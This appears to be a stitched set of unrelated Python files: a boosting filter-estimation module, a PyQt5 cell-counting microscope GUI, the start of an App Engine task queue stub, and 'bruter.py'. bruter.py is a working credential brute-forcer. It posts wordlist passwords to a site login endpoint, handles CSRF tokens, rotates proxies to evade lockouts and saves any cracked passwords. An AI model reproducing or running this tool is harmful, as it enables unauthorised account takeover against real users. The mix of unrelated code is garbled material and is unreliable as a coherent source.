def __init__(self, i_stim, i_time, delta_signed, e_test, e_train):
self.i_stim = i_stim
self.i_time = i_time
self.delta = delta_signed
self.e_train = e_train
self.e_test = e_test
def boost(y, x, x_pads, all_index, train_index, test_index, i_start, trf_length,
delta, mindelta, error, selective_stopping=0, return_history=False):
"""Estimate one filter with boosting
Parameters
----------
y : array (n_times,)
Dependent signal, time series to predict.
x : array (n_stims, n_times)
Stimulus.
x_pads : array (n_stims,)
Padding for x.
    all_index : array of (start, stop)
        Time sample index of all segments (training and testing).
    train_index : array of (start, stop)
        Time sample index of training segments.
    test_index : array of (start, stop)
        Time sample index of test segments.
    i_start : int
        Index offset of the first kernel sample relative to the stimulus (in time samples).
trf_length : int
Length of the TRF (in time samples).
delta : scalar
Step of the adjustment.
mindelta : scalar
Smallest delta to use. If no improvement can be found in an iteration,
the first step is to divide delta in half, but stop if delta becomes
smaller than ``mindelta``.
error : str
Error function to use.
selective_stopping : int
Selective stopping.
return_history : bool
Return error history as second return value.
Returns
-------
history[best_iter] : None | array
Winning kernel, or None if 0 is the best kernel.
test_sse_history : list (only if ``return_history==True``)
        Error for the test data at each iteration.
"""
delta_error_func = DELTA_ERROR_FUNC[error]
error = ERROR_FUNC[error]
n_stims, n_times = x.shape
assert y.shape == (n_times,)
h = np.zeros((n_stims, trf_length))
# buffers
y_error = y.copy()
new_error = np.empty(h.shape)
new_sign = np.empty(h.shape, np.int8)
x_active = np.ones(n_stims, dtype=np.int8)
# history
best_test_error = np.inf
history = []
i_stim = i_time = delta_signed = None
best_iteration = 0
# pre-assign iterators
for i_boost in range(999999):
# evaluate current h
e_test = error(y_error, test_index)
e_train = error(y_error, train_index)
step = BoostingStep(i_stim, i_time, delta_signed, e_test, e_train)
history.append(step)
# evaluate stopping conditions
if e_test < best_test_error:
best_test_error = e_test
best_iteration = i_boost
elif i_boost >= 2 and e_test > history[-2].e_test:
if selective_stopping:
if selective_stopping > 1:
n_bad = selective_stopping - 1
# only stop if the predictor overfits twice without intermittent improvement
undo = 0
for i in range(-2, -len(history), -1):
step = history[i]
if step.e_test > e_test:
break # the error improved
elif step.i_stim == i_stim:
if step.e_test > history[i - 1].e_test:
# the same stimulus caused an error increase
if n_bad == 1:
undo = i
break
n_bad -= 1
else:
break
else:
undo = -1
if undo:
# revert changes
for i in range(-undo):
step = history.pop(-1)
h[step.i_stim, step.i_time] -= step.delta
update_error(y_error, x[step.i_stim], x_pads[step.i_stim], all_index, -step.delta, step.i_time + i_start)
step = history[-1]
# disable predictor
x_active[i_stim] = False
if not np.any(x_active):
break
new_error[i_stim, :] = np.inf
# Basic
# -----
# stop the iteration if all the following requirements are met
# 1. more than 10 iterations are done
# 2. The testing error in the latest iteration is higher than that in
# the previous two iterations
elif i_boost > 10 and e_test > history[-3].e_test:
# print("error(test) not improving in 2 steps")
break
# generate possible movements -> training error
generate_options(y_error, x, x_pads, x_active, train_index, i_start, delta_error_func, delta, new_error, new_sign)
i_stim, i_time = np.unravel_index(np.argmin(new_error), h.shape)
new_train_error = new_error[i_stim, i_time]
delta_signed = new_sign[i_stim, i_time] * delta
# If no improvements can be found reduce delta
if new_train_error > step.e_train:
delta *= 0.5
if delta >= mindelta:
i_stim = i_time = delta_signed = None
# print("new delta: %s" % delta)
continue
else:
# print("No improvement possible for training data")
break
# abort if we're moving in circles
if step.delta and i_stim == step.i_stim and i_time == step.i_time and delta_signed == -step.delta:
break
# update h with best movement
h[i_stim, i_time] += delta_signed
update_error(y_error, x[i_stim], x_pads[i_stim], all_index, delta_signed, i_time + i_start)
else:
raise RuntimeError("Maximum number of iterations exceeded")
# print(' (%i iterations)' % (i_boost + 1))
# reverse changes after best iteration
if best_iteration:
for step in history[-1: best_iteration: -1]:
if step.delta:
h[step.i_stim, step.i_time] -= step.delta
else:
h = None
if return_history:
return h, [step.e_test for step in history]
else:
return h
def setup_workers(data, i_start, trf_length, delta, mindelta, error, selective_stopping):
n_y, n_times = data.y.shape
n_x, _ = data.x.shape
y_buffer = RawArray('d', n_y * n_times)
y_buffer[:] = data.y.ravel()
x_buffer = RawArray('d', n_x * n_times)
x_buffer[:] = data.x.ravel()
x_pads_buffer = RawArray('d', n_x)
x_pads_buffer[:] = data.x_pads
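    # the RawArray buffers are shared with the worker processes, so y and x are not
    # copied for every job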
job_queue = Queue(200)
result_queue = Queue(200)
args = (y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, data.cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue)
for _ in range(CONFIG['n_workers']):
process = Process(target=boosting_worker, args=args)
process.start()
return job_queue, result_queue
def boosting_worker(y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue):
if CONFIG['nice']:
os.nice(CONFIG['nice'])
y = np.frombuffer(y_buffer, np.float64, n_y * n_times).reshape((n_y, n_times))
x = np.frombuffer(x_buffer, np.float64, n_x * n_times).reshape((n_x, n_times))
x_pads = np.frombuffer(x_pads_buffer, np.float64, n_x)
while True:
y_i, seg_i = job_queue.get()
if y_i == JOB_TERMINATE:
return
all_index, train_index, test_index = cv_segments[seg_i]
h = boost(y[y_i], x, x_pads, all_index, train_index, test_index, i_start, trf_length, delta, mindelta, error, selective_stopping)
result_queue.put((y_i, seg_i, h))
def put_jobs(queue, n_y, n_segs, stop):
"Feed boosting jobs into a Queue"
for job in product(range(n_y), range(n_segs)):
queue.put(job)
        if stop.is_set():
while not queue.empty():
queue.get()
break
for _ in range(CONFIG['n_workers']):
queue.put((JOB_TERMINATE, None))
def convolve(h, x, x_pads, h_i_start, segments=None, out=None):
"""h * x with time axis matching x
Parameters
----------
h : array, (n_stims, h_n_samples)
H.
x : array, (n_stims, n_samples)
X.
x_pads : array (n_stims,)
Padding for x.
h_i_start : int
Time shift of the first sample of ``h``.
segments : array (n_segments, 2)
Data segments.
out : array
Buffer for predicted ``y``.
"""
n_x, n_times = x.shape
h_n_times = h.shape[1]
if out is None:
out = np.zeros(n_times)
else:
out.fill(0)
if segments is None:
segments = ((0, n_times),)
# determine valid section of convolution (cf. _ndvar.convolve())
h_i_max = h_i_start + h_n_times - 1
out_start = max(0, h_i_start)
out_stop = min(0, h_i_max)
conv_start = max(0, -h_i_start)
conv_stop = -h_i_start
# padding
h_pad = np.sum(h * x_pads[:, newaxis], 0)
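    # h_pad is the kernel's response to the constant x_pads value; it is added where
    # the convolution would otherwise extend past a segment edge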
    # padding added at the start of each segment
pad_head_n_times = max(0, h_n_times + h_i_start)
if pad_head_n_times:
pad_head = np.zeros(pad_head_n_times)
for i in range(min(pad_head_n_times, h_n_times)):
pad_head[:pad_head_n_times - i] += h_pad[- i - 1]
else:
pad_head = None
    # padding added at the end of each segment
pad_tail_n_times = -min(0, h_i_start)
if pad_tail_n_times:
pad_tail = np.zeros(pad_tail_n_times)
for i in range(pad_tail_n_times):
pad_tail[i:] += h_pad[i]
else:
pad_tail = None
for start, stop in segments:
if pad_head is not None:
out[start: start + pad_head_n_times] += pad_head
if pad_tail is not None:
out[stop - pad_tail_n_times: stop] += pad_tail
out_index = slice(start + out_start, stop + out_stop)
y_index = slice(conv_start, stop - start + conv_stop)
for ind in range(n_x):
out[out_index] += scipy.signal.convolve(h[ind], x[ind, start:stop])[y_index]
return out
def evaluate_kernel(y, y_pred, error, i_skip, segments=None):
"""Fit quality statistics
Parameters
----------
y : array, (n_samples)
Y.
y_pred : array, (n_samples)
Predicted Y.
error : str
Error metric.
i_skip : int
Skip this many samples for evaluating model fit.
segments : array (n_segments, 2)
Data segments.
Returns
-------
r : float | array
Pearson correlation.
rank_r : float | array
Spearman rank correlation.
error : float | array
Error corresponding to error_func.
"""
# discard onset
if i_skip:
assert segments is None, "Not implemented"
y = y[i_skip:]
y_pred = y_pred[i_skip:]
error_func = ERROR_FUNC[error]
index = np.array(((0, len(y)),), np.int64)
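    # a single segment covering the whole (possibly trimmed) series, as expected by the error function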
return (np.corrcoef(y, y_pred)[0, 1],
spearmanr(y, y_pred)[0],
error_func(y - y_pred, index))
|
bruter.py
|
# Date: 05/05/2018
# Author: Pure-L0G1C
# Description: Bruter
from .spyder import Spyder
from .scraper import Queue
from .session import Session
from time import time, sleep
from threading import Thread, Lock
from os import system, remove, path
from platform import system as platform
from .const import max_fails, fetch_time, site_details, max_proxy_usage, credentials
class Bruter(object):
def __init__(self, username, threads, wordlist):
self.max_threads = threads if all([threads <= 16, threads > 0]) else 16 # 16 is the absolute maximum
self.cls = 'cls' if platform() == 'Windows' else 'clear'
self.session = Session(username, wordlist)
self.proxy_usage_count = 0
self.wordlist = wordlist
self.username = username
self.user_abort = False
self.passlist = Queue()
self.spyder = Spyder()
self.retrieve = False
self.isFound = False
self.isAlive = True
self.lock = Lock()
self.read = False
self.attempts = 0
self.threads = 0
self.pwd = None
self.ip = None
self.fails = 0
# reduce flickering display on Windows
self.last_attempt = None
self.last_proxy = None
self.last_ip = None
def login(self, pwd):
try:
if not self.spyder.proxies.qsize:
return
with self.lock:
self.pwd = pwd
self.threads += 1
self.proxy_usage_count += 1
br = self.spyder.br
home_url = site_details['home_url']
login_url = site_details['login_url']
username_field = site_details['username_field']
password_field = site_details['password_field']
data = { username_field: self.username, password_field: pwd }
br.headers.update({'X-CSRFToken': br.get(home_url).cookies.get_dict()['csrftoken']})
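            # the CSRF token is read from the cookies returned by a GET on the home page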
# login
response = br.post(login_url, data=data, timeout=fetch_time).json()
# validate
if 'authenticated' in response:
if response['authenticated']:
self.pwd_found(pwd)
elif 'message' in response:
if response['message'] == 'checkpoint_required':
self.pwd_found(pwd)
elif response['status'] == 'fail': # account got locked
if self.threads > 0:
with self.lock:self.threads -= 1
return
else:pass
else:pass
with self.lock:
if all([not self.isFound, self.isAlive, pwd in self.passlist.queue]):
self.passlist.queue.pop(self.passlist.queue.index(pwd))
self.attempts += 1
except KeyboardInterrupt:
self.user_abort = True
self.stop()
except:
with self.lock:self.fails += 1
finally:
if self.threads > 0:
with self.lock:self.threads -= 1
def pwd_found(self, pwd):
if self.isFound:return
self.isFound = True
del self.passlist.queue[:]
self.display(pwd, True)
def kill(self):
self.isAlive = False
self.spyder.isAlive = False
def display(self, pwd, isFound=False, n=1):
if not isFound:system(self.cls)
else:
with open(credentials, 'a') as f:
f.write('Username: {}\nPassword: {}\n\n'.format(self.username, pwd))
pwd = pwd if pwd else ''
ip = '{}[{}]'.format(self.ip, self.spyder.proxy_info['country']) if all([self.ip, self.spyder.proxy_info]) else ''
try:
if not isFound:
print('[-] Proxy-IP: {}\n[-] Wordlist: {}\n[-] Username: {}\n[-] Password: {}\n[-] Attempts: {}\n[-] Proxies: {}'.
format(ip, self.wordlist, self.username, ', '.join(self.passlist.queue) if not self.isFound else pwd, self.attempts, self.spyder.proxies.qsize))
if not n:self.display(pwd, isFound=True)
else:
if n:self.display(pwd, n-1)
print('\n[!] Password Found\n[+] Username: {}\n[+] Password: {}'.format(self.username, pwd))
except:pass
def attack(self):
while all([not self.isFound, self.isAlive]):
try:
if any([not self.ip, self.proxy_usage_count >= max_proxy_usage, self.fails >= max_fails]):
try:
if not self.spyder.proxies.qsize:continue
self.spyder.renew_proxy()
ip = self.spyder.ip_addr()
if not ip:continue
self.proxy_usage_count = 0
self.fails = 0
self.ip = ip
except KeyboardInterrupt:
self.user_abort = True
self.stop()
# try all the passwords in the queue
for pwd in self.passlist.queue:
if self.threads >= self.max_threads:break
if any([not self.isAlive, self.isFound]):break
if self.proxy_usage_count >= max_proxy_usage:break
# login thread
login = Thread(target=self.login, args=[pwd])
login.daemon = True
login.start()
# wait time
started = time()
# wait for threads
while all([not self.isFound, self.isAlive, self.threads>0, self.passlist.qsize]):
try:
# bypass slow, authentication required, and hanging proxies
if int(time() - started) >= 5:
self.fails = max_fails
self.threads = 0
except:pass
else:
self.threads = 0
if all([self.isAlive, not self.isFound]):
self.session.write(self.attempts, self.passlist.queue)
except KeyboardInterrupt:
self.user_abort = True
self.stop()
except:pass
def pwd_manager(self):
with open(self.wordlist, 'r') as wordlist:
attempts = 0
for pwd in wordlist:
if any([not self.isAlive, self.isFound]):break
if self.retrieve:
if attempts < (self.attempts + self.passlist.qsize)-1:
attempts += 1
continue
else:self.retrieve = False
if self.passlist.qsize <= self.max_threads:
self.passlist.put(pwd.replace('\n', '').replace('\r', '').replace('\t', ''))
else:
while all([self.passlist.qsize, not self.isFound, self.isAlive]):pass
if all([not self.passlist.qsize, not self.isFound, self.isAlive]):
self.passlist.put(pwd.replace('\n', '').replace('\r', '').replace('\t', ''))
# done reading wordlist
self.read = True if all([not self.user_abort, self.isAlive]) else False
while all([not self.isFound, self.isAlive, self.passlist.qsize]):
try:sleep(1.5)
except KeyboardInterrupt:
self.user_abort = True
self.stop()
if self.isAlive:self.stop()
def stop(self):
if any([self.read, self.isFound]):self.session.delete()
else:self.session.write(self.attempts, self.passlist.queue)
self.kill()
def primary_threads(self):
proxy_manager = Thread(target=self.spyder.proxy_manager)
proxy_manager.daemon = True
proxy_manager.start()
pwd_manager = Thread(target=self.pwd_manager)
pwd_manager.daemon = True
pwd_manager.start()
attack = Thread(target=self.attack)
attack.daemon = True
attack.start()
def start(self):
self.primary_threads()
while all([not self.isFound, self.isAlive]):
try:
if self.isAlive:
if self.ip:
if any([self.last_attempt != self.attempts, self.last_proxy != self.spyder.proxies.qsize, self.last_ip != self.ip]):
self.display(self.pwd)
self.last_proxy = self.spyder.proxies.qsize
self.last_attempt = self.attempts
self.last_ip = self.ip
else:self.display(self.pwd)
if not self.spyder.proxy_info:
print('\n[+] Searching for proxies ...')
sleep(1.5 if not self.spyder.proxy_info else 0.5)
except KeyboardInterrupt:
self.user_abort = True
self.stop()
|
mainWindow.py
|
import os
import queue as Queue
import threading
from datetime import datetime
import numpy as np
import cv2
from PyQt5.QtCore import Qt
from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QShortcut, QStackedWidget, QMessageBox, QWidget, QVBoxLayout, QHBoxLayout, QPushButton
from PyQt5.QtGui import QKeySequence
from logger import logger
from count import getCells
import util
from gui.imageWidget import ImageWidget
from gui.settingsWidget import SettingsWidget
from hardwareHandler import HardwareHandler
class MainWindow(QMainWindow):
errorSignal = pyqtSignal(str) #emitted when errors occur. error box with message msg is opened by main thread
countingDoneSignal = pyqtSignal()
triggeringDoneSignal = pyqtSignal()
backToPreviewSignal = pyqtSignal()
def __init__(self):
super(MainWindow, self).__init__()
self.errorSignal .connect(self.openErrorMessage)
self.countingDoneSignal .connect(self.countingDone)
self.triggeringDoneSignal.connect(self.triggeringDone)
self.backToPreviewSignal .connect(self.backToPreview)
self.cellsQueue = Queue.Queue() # queue to pass cell coordinates found by counting algorithm
self.imageQueue = Queue.Queue() # Queue to hold images
self.mode = None # "Color" or "UV"
util.loadSettings()
self.hardwareHandler = HardwareHandler(self.imageQueue)
##### shortcuts ####
self.quitSC = QShortcut(QKeySequence('Ctrl+Q'), self)
self.quitSC.activated.connect(QApplication.instance().quit)
self.exitFS = QShortcut("ESC", self)
self.exitFS.activated.connect(self.showMaximized)
def switchMaxFS():
if self.isFullScreen():
                self.showNormal()  # workaround: if showNormal is not called in between, showMaximized does not work
self.showMaximized()
else: self.showFullScreen()
self.switchMaxFS = QShortcut(QKeySequence('Ctrl+F'), self)
self.switchMaxFS.activated.connect(switchMaxFS)
############# layout #############
self.centralWidget = QWidget(self)
self.hlayout = QHBoxLayout()
##### image view #####
self.imageWidget = ImageWidget(self.imageQueue, self)
self.hlayout.addWidget(self.imageWidget)
##### control widget #####
self.controlWidget = QStackedWidget()
self.controlWidget.setMaximumWidth(320)
## page 1 - main page##
self.page1Widget = QWidget(self.controlWidget)
self.page1Layout = QVBoxLayout()
self.page1Widget.setLayout(self.page1Layout)
buttonTrigger = QPushButton("&Trigger")
buttonSettings = QPushButton("&Settings")
buttonTriggerAndSave = QPushButton("Trigger + Save")
self.buttonMode = QPushButton("Switch to ...")
buttonTrigger .clicked.connect(self.trigger)
buttonSettings .clicked.connect(lambda: self.controlWidget.setCurrentIndex(2))
buttonSettings .clicked.connect(lambda: self.infoTextBox.setText(""))
buttonTriggerAndSave.clicked.connect(self.triggerAndSave)
self.buttonMode .clicked.connect(lambda: self.changeMode())
self.page1Layout.addWidget(buttonTrigger)
self.page1Layout.addWidget(self.buttonMode)
self.page1Layout.addWidget(buttonSettings)
self.page1Layout.addWidget(buttonTriggerAndSave)
## page 2 - image captured##
self.page2Widget = QWidget(self.controlWidget)
self.page2Layout = QVBoxLayout()
self.page2Widget.setLayout(self.page2Layout)
buttonBackToPreview = QPushButton("&Back")
buttonSaveImage = QPushButton("&Save")
buttonCount = QPushButton("&Count")
buttonBackToPreview.clicked.connect(self.backToPreview)
buttonSaveImage .clicked.connect(lambda: self.saveImage())
buttonCount .clicked.connect(self.startCounting)
self.page2Layout.addWidget(buttonBackToPreview)
self.page2Layout.addWidget(buttonSaveImage)
self.page2Layout.addWidget(buttonCount)
## page 3 - settings ##
self.settingsWidget = SettingsWidget(self.controlWidget)
self.settingsWidget.OKButton.clicked.connect(lambda: self.controlWidget.setCurrentIndex(0))
self.settingsWidget.OKButton.clicked.connect(lambda: self.infoTextBox.setText("Live capturing"))
# signals emitted when settings change
self.settingsWidget.UVLEDSettingsUpdatedSignal .connect(self.hardwareHandler.updateLEDUV)
self.settingsWidget.ColorLEDSettingsUpdatedSignal .connect(self.hardwareHandler.updateLEDColors)
self.settingsWidget.captureSettingsUpdatedSignal .connect(lambda : self.hardwareHandler.updateCaptureSettings(mode = self.mode))
self.settingsWidget.resetSignal .connect(self.hardwareHandler.updateLEDUV)
self.settingsWidget.resetSignal .connect(self.hardwareHandler.updateLEDColors)
self.settingsWidget.resetSignal .connect(lambda : self.hardwareHandler.updateCaptureSettings(mode = self.mode))
#set mode if tab is changed in settings widget
def setModeFromTabIndex(tabIndex: int):
if tabIndex == 0: self.changeMode("Color")
elif tabIndex == 1: self.changeMode("UV")
self.settingsWidget.tabs.currentChanged.connect(setModeFromTabIndex)
## page 4 - counting ##
self.page4Widget = QWidget(self.controlWidget)
self.page4Layout = QVBoxLayout(self.page4Widget)
# buttonStopCounting = QPushButton("&Stop Counting")
# buttonStopCounting.clicked.connect(self.stopCounting)
# self.page4Layout.addWidget(buttonStopCounting)
countingLabel = QLabel("Counting..", alignment = Qt.AlignCenter)
self.page4Layout.addWidget(countingLabel)
## page 5 - trigger and save ##
self.page5Widget = QWidget(self.controlWidget)
self.page5Layout = QVBoxLayout(self.page5Widget)
self.triggerAndSaveLabel = QLabel("Capture color Image\t\n"
"Save color Image\t\t\n"
"Capture UV Image\t\n"
"Save UV Image\t\t", alignment = Qt.AlignVCenter | Qt.AlignLeft)
self.page5Layout.addWidget(self.triggerAndSaveLabel)
self.controlWidget.addWidget(self.page1Widget)
self.controlWidget.addWidget(self.page2Widget)
self.controlWidget.addWidget(self.settingsWidget)
self.controlWidget.addWidget(self.page4Widget)
self.controlWidget.addWidget(self.page5Widget)
self.hlayout.addWidget(self.controlWidget)
self.hlayout.setContentsMargins(0,0,0,0)
self.centralWidget.setLayout(self.hlayout)
self.setCentralWidget(self.centralWidget)
## info in right bottom corner
self.infoTextBox = QLabel(self.centralWidget)
self.infoTextBox.setText("TEST")
self.infoTextBox.setAlignment(Qt.AlignRight | Qt.AlignBottom)
self.infoTextBox.setAttribute(Qt.WidgetAttribute.WA_TransparentForMouseEvents) # pylint: disable=no-member
self.installEventFilter( util.ObjectResizer(self, self.infoTextBox))
logger.info("Gui started")
# start capture and led
self.changeMode("Color")
self.imageWidget.startShowLive()
self.infoTextBox.setText("Live capturing")
# def stopCapturing(self):
# self.imageWidget.stopShowLive()
# self.hardwareHandler.stopCapturing()
# self.capture_thread.join()
# self.imageQueue.queue.clear()
def changeMode(self, mode = None):
if mode is None:
if self.mode == "UV" : mode = "Color"
elif self.mode == "Color": mode = "UV"
if mode != self.mode:
logger.info(f"Changing mode to '{mode}'.")
self.mode = mode
if self.mode == "UV":
#update button text
self.buttonMode.setText("Switch to Color")
                # update settings tab; block signals to avoid infinite cyclic signal calls
self.settingsWidget.tabs.blockSignals(True)
self.settingsWidget.tabs.setCurrentIndex(1)
self.settingsWidget.tabs.blockSignals(False)
#set leds
self.hardwareHandler.switchCOLOR_LED(False)
self.hardwareHandler.switchUV_LED (True)
elif self.mode == "Color":
#update button text
self.buttonMode.setText("Switch to UV")
                # update settings tab; block signals to avoid infinite cyclic signal calls
self.settingsWidget.tabs.blockSignals(True)
self.settingsWidget.tabs.setCurrentIndex(0)
self.settingsWidget.tabs.blockSignals(False)
#set leds
self.hardwareHandler.switchCOLOR_LED(True)
self.hardwareHandler.switchUV_LED (False)
self.hardwareHandler.updateCaptureSettings(mode = self.mode)
### button events ###
def trigger(self):
self.page1Widget.setEnabled(False)
logger.info("Fetching image")
self.infoTextBox.setText("Fetching image")
self.imageWidget.stopShowLive()
self.hardwareHandler.stopCapturing()
def run():
fullImage = self.hardwareHandler.shootImage_fullResolution(mode = self.mode)
self.imageWidget.shwoFullImage(fullImage)
self.triggeringDoneSignal.emit()
thread = threading.Thread(target = run)
thread.start()
def triggeringDone(self):
self.controlWidget.setCurrentIndex(1)
self.page1Widget.setEnabled(True)
self.infoTextBox.setText("Ready")
def backToPreview(self):
self.infoTextBox.setText("Live capturing")
self.controlWidget.setCurrentIndex(0)
self.imageWidget.annotatedImage = None
self.hardwareHandler.startCapturing(mode = self.mode)
self.imageWidget.startShowLive()
def triggerAndSave(self):
def run():
            # stop capturing
self.imageWidget.stopShowLive()
self.hardwareHandler.stopCapturing()
#set gui info
self.controlWidget.setCurrentIndex(4)
self.triggerAndSaveLabel.setText("Capture color Image\t\n"
"Save color Image\t\t\n"
"Capture UV Image\t\n"
"Save UV Image\t\t")
# use timestamp for file names
timeStamp = datetime.now().strftime("%d_%m_%Y_%H_%M_%S")
########## color image ##########
# set color leds
self.hardwareHandler.switchCOLOR_LED(True)
self.hardwareHandler.switchUV_LED (False)
#capture image
fullImage = self.hardwareHandler.shootImage_fullResolution(mode = "Color")
#show image
self.imageWidget.shwoFullImage(fullImage)
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t\n"
"Capture UV Image\t\n"
"Save UV Image\t\t")
self.saveImage(fileName=f"{timeStamp}_color")
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t-> done\n"
"Capture UV Image\t\n"
"Save UV Image\t\t")
########## UV image ##########
# set UV leds
self.hardwareHandler.switchCOLOR_LED(False)
self.hardwareHandler.switchUV_LED (True)
#capture image
fullImage = self.hardwareHandler.shootImage_fullResolution(mode = "UV")
#show image
self.imageWidget.shwoFullImage(fullImage)
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t-> done\n"
"Capture UV Image\t-> done\n"
"Save UV Image\t\t")
self.saveImage(fileName=f"{timeStamp}_UV")
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t-> done\n"
"Capture UV Image\t-> done\n"
"Save UV Image\t\t")
self.backToPreviewSignal.emit()
thread = threading.Thread(target = run)
thread.start()
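    # Cell counting runs in a background thread (count()); the detected cells
    # are handed back through cellsQueue and countingDoneSignal so the GUI is
    # updated from the Qt main thread.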
def startCounting(self):
logger.info("Counting...")
self.infoTextBox.setText("Counting...")
self.countingThread = threading.Thread(target = self.count)
self.countingThread.start()
self.controlWidget.setCurrentIndex(3)
# def stopCounting(self):
# logger.info("Counting stopped")
# self.infoTextBox.setText("Counting stopped")
# self.controlWidget.setCurrentIndex(1)
def countingDone(self):
logger.info("Counting done")
self.infoTextBox.setText("Counting done")
cells = self.cellsQueue.get()
logger.info(f"{len(cells)} cells found")
self.imageWidget.markCells(cells)
self.controlWidget.setCurrentIndex(1)
def count(self):
cells = getCells(self.imageWidget.fullImage)
self.cellsQueue.put(cells)
self.countingDoneSignal.emit()
@pyqtSlot(str)
def openErrorMessage(self, msg):
logger.fatal(msg)
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Critical)
msgBox.setText(msg)
msgBox.setWindowTitle("Error")
msgBox.exec_()
def saveImage(self, fileName = None):
"""save image to usb file. default file name is timestamp
:param str fileName: ending .tiff is added automatically"""
self.infoTextBox.setText("Saving image")
self.page2Widget.setEnabled(False)
try:
usbPath = util.getUsbDevicePath()
except IndexError:
self.page2Widget.setEnabled(True)
self.infoTextBox.setText("Saving failed")
self.errorSignal.emit("No USB device found - file was not saved")
return
if fileName is None:
fileName = datetime.now().strftime("%d_%m_%Y_%H_%M_%S")
cv2.imwrite(os.path.join(usbPath, fileName + ".tiff"), cv2.cvtColor(self.imageWidget.fullImage , cv2.COLOR_RGB2BGR))
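        # Additionally export the annotated overlay (marked cells) if one exists.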
if isinstance(self.imageWidget.annotatedImage, np.ndarray):
cv2.imwrite(os.path.join(usbPath, fileName + "_annotated.tiff"), cv2.cvtColor(self.imageWidget.annotatedImage, cv2.COLOR_RGB2BGR))
logger.info("Saved File to " + usbPath)
self.page2Widget.setEnabled(True)
self.infoTextBox.setText("Image saved")
taskqueue_stub.py
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stub version of the Task Queue API.
This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.
As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""
from __future__ import with_statement
__all__ = []
import base64
import bisect
import calendar
import datetime
import logging
import os
import random
import string
import threading
import time
import taskqueue_service_pb
import taskqueue
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.api import request_info
from google.appengine.api.taskqueue import taskqueue
from google.appengine.runtime import apiproxy_errors
DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0
DEFAULT_BUCKET_SIZE = 5
MAX_ETA = datetime.timedelta(days=30)
MAX_PULL_TASK_SIZE_BYTES = 2 ** 20
MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)
MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES
MAX_REQUEST_SIZE = 32 << 20
BUILT_IN_HEADERS = set(['x-appengine-queuename',
'x-appengine-taskname',
'x-appengine-taskexecutioncount',
'x-appengine-taskpreviousresponse',
'x-appengine-taskretrycount',
'x-appengine-tasketa',
'x-appengine-development-payload',
'content-length'])
DEFAULT_QUEUE_NAME = 'default'
INF = 1e500
QUEUE_MODE = taskqueue_service_pb.TaskQueueMode
AUTOMATIC_QUEUES = {
DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
'__cron': (1, 1, '1/s')}
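# Each tuple maps to the leading positional arguments of _Queue:
# (bucket_refill_per_second, bucket_capacity, user_specified_rate).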
def _GetAppId(request):
"""Returns the app id to use for the given request.
Args:
request: A protocol buffer that has an app_id field.
Returns:
A string containing the app id or None if no app id was specified.
"""
if request.has_app_id():
return request.app_id()
else:
return None
def _SecToUsec(t):
"""Converts a time in seconds since the epoch to usec since the epoch.
Args:
t: Time in seconds since the unix epoch
Returns:
An integer containing the number of usec since the unix epoch.
"""
return int(t * 1e6)
def _UsecToSec(t):
"""Converts a time in usec since the epoch to seconds since the epoch.
Args:
t: Time in usec since the unix epoch
Returns:
A float containing the number of seconds since the unix epoch.
"""
return t / 1e6
def _FormatEta(eta_usec):
"""Formats a task ETA as a date string in UTC."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
return eta.strftime('%Y/%m/%d %H:%M:%S')
def _TruncDelta(timedelta):
"""Strips the microseconds field from a timedelta.
Args:
timedelta: a datetime.timedelta.
Returns:
A datetime.timedelta with the microseconds field not filled.
"""
return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)
def _EtaDelta(eta_usec, now):
"""Formats a task ETA as a relative time string."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
if eta > now:
return '%s from now' % _TruncDelta(eta - now)
else:
return '%s ago' % _TruncDelta(now - eta)
def QueryTasksResponseToDict(queue_name, task_response, now):
"""Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.
Args:
queue_name: The name of the queue this task came from.
task_response: An instance of TaskQueueQueryTasksResponse_Task.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A dict containing the fields used by the dev appserver's admin console.
Raises:
ValueError: A task response contains an unknown HTTP method type.
"""
task = {}
task['name'] = task_response.task_name()
task['queue_name'] = queue_name
task['url'] = task_response.url()
method = task_response.method()
if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
task['method'] = 'GET'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
task['method'] = 'POST'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
task['method'] = 'HEAD'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
task['method'] = 'PUT'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
task['method'] = 'DELETE'
else:
raise ValueError('Unexpected method: %d' % method)
task['eta'] = _FormatEta(task_response.eta_usec())
task['eta_usec'] = task_response.eta_usec()
